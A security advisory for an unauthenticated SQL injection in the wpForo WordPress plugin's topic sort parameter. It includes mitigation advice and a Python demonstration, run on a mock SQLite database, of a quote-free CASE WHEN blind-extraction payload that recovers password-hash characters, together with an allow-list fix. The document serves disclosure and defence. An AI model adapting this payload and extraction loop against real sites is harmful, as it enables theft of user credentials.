wpForo: Unauthenticated SQL Injection via Unquoted Identifiers
CVE-2026-28562
Summary
The wpForo forum plugin for WordPress contains an unauthenticated SQL injection flaw. Topics::get_topics() builds its ORDER BY clause from the request parameter wpfob after passing it through esc_sql(). That function escapes quote characters, which protects string literals but does nothing for an unquoted identifier, so a payload that contains no quotes (for example a CASE WHEN expression) reaches the query intact. By observing how the returned topic order changes, an attacker with no account can extract data from the WordPress database one comparison at a time, including password hashes from the users table. At the time of writing no fixed release is listed for the affected version range.
What to do
No fix is available yet. Check with your software vendor for updates. Until a fixed release appears, treat the plugin as exploitable by any unauthenticated visitor: deactivating it, or blocking requests whose wpfob parameter contains anything other than an expected sort-column name, limits exposure. Because the extractable data includes password hashes, consider forcing a password reset for privileged accounts if there is any sign the endpoint was probed.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| gvectors | wpforo_forum | > 2.4.0, <= 2.4.15 | – |
Original title
wpForo 2.4.14 contains an unauthenticated SQL injection vulnerability in Topics::get_topics() where the ORDER BY clause relies on ineffective esc_sql() sanitization on unquoted identifiers. Attacke...
Original description
wpForo 2.4.14 contains an unauthenticated SQL injection vulnerability in Topics::get_topics() where the ORDER BY clause relies on ineffective esc_sql() sanitization on unquoted identifiers. Attackers exploit the wpfob parameter with CASE WHEN payloads to perform blind boolean extraction of credentials from the WordPress database.
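The mechanism described above, as an added example that is not wpForo's code and does not reproduce the plugin's internals: a sort expression interpolated into ORDER BY after an esc_sql()-style escape, a quote-free CASE WHEN payload that turns the result order into a true/false oracle, and the allow-list fix that identifier positions require because they cannot be bound as parameters. The database schema, the fake password hash, the esc_sql() imitation and the function names are all constructed for this illustration; SQLite stands in for MySQL, and the one non-portable detail (CHAR() for quote-free string construction) exists in both engines.

```python
import sqlite3


def esc_sql(value: str) -> str:
    """Imitation of quote/backslash escaping in the style of WordPress esc_sql().

    Assumption: this models the escaping behaviour only; it is not the WordPress
    implementation. The point is what it does NOT touch: anything that is not a
    quote or backslash passes through unchanged.
    """
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a users table with a fake hash and a few topics."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BexampleHashOnlyForThisDemo000000');
        CREATE TABLE wpforo_topics (topicid INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO wpforo_topics VALUES (1, 'alpha'), (2, 'bravo'), (3, 'charlie');
        """
    )
    return con


def get_topics_vulnerable(con: sqlite3.Connection, orderby: str, order: str = "ASC"):
    """Vulnerable pattern: the sort expression is an unquoted identifier, so escaping
    quotes cannot confine it. Whatever the caller supplies becomes SQL syntax."""
    sql = f"SELECT topicid FROM wpforo_topics ORDER BY {esc_sql(orderby)} {order}"
    return [row[0] for row in con.execute(sql)]


def oracle_payload(position: int, codepoint: int) -> str:
    """Quote-free CASE WHEN expression for the ORDER BY position.

    True  -> rows sorted by topicid ascending  -> [1, 2, 3]
    False -> rows sorted by -topicid ascending -> [3, 2, 1]
    CHAR(n) builds the comparison character without a quote, so esc_sql() is inert.
    """
    return (
        f"CASE WHEN (SELECT SUBSTR(user_pass,{position},1) FROM wp_users WHERE ID=1)"
        f"=CHAR({codepoint}) THEN topicid ELSE -topicid END"
    )


def extract_blind(con: sqlite3.Connection, length: int) -> str:
    """Recover the first `length` characters of the hash using only the row order."""
    recovered = ""
    for pos in range(1, length + 1):
        for cp in range(32, 127):  # printable ASCII
            if get_topics_vulnerable(con, oracle_payload(pos, cp)) == [1, 2, 3]:
                recovered += chr(cp)
                break
    return recovered


# Allow-list: the interpolated text comes from this table, never from the request.
ORDERBY_COLUMNS = {"topicid": "topicid", "title": "title"}
ORDER_DIRECTIONS = {"ASC", "DESC"}


def get_topics_hardened(con: sqlite3.Connection, orderby: str, order: str = "ASC"):
    """Hardened pattern: identifiers cannot be bound as parameters, so the request
    value is only used as a lookup key; unknown keys fall back to a safe default."""
    column = ORDERBY_COLUMNS.get(orderby, "topicid")
    direction = order.upper() if order.upper() in ORDER_DIRECTIONS else "ASC"
    sql = f"SELECT topicid FROM wpforo_topics ORDER BY {column} {direction}"
    return [row[0] for row in con.execute(sql)]


if __name__ == "__main__":
    db = build_db()
    payload = oracle_payload(1, 36)  # is the first hash character '$' ?
    print("esc_sql() changed the payload:", esc_sql(payload) != payload)
    print("vulnerable, true branch :", get_topics_vulnerable(db, payload))
    print("vulnerable, false branch:", get_topics_vulnerable(db, oracle_payload(1, 65)))
    print("blind extraction of 4 chars:", extract_blind(db, 4))
    print("hardened, same payload  :", get_topics_hardened(db, payload))
```

The oracle needs no error messages and no data from the users table in the response body; the order of the topic list alone leaks one bit per request, which is why a query that only ever returns public topics can still expose credentials. The hardened version is the same shape any ORDER BY built from user input should take: validate against a fixed set of known column names and directions, and interpolate the trusted constant, not the request value.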
NVD CVSS 3.1: 9.8
NVD CVSS 4.0: 8.8
Vulnerability type
CWE-89
SQL Injection
- Product: https://wordpress.org/plugins/wpforo/
- Release notes: https://wordpress.org/plugins/wpforo/#developers
- Third-party advisory: https://www.vulncheck.com/advisories/wpforo-sql-injection-via-topics-order-by-pa...
Published: 28 Feb 2026 · Updated: 13 Mar 2026 · First seen: 6 Mar 2026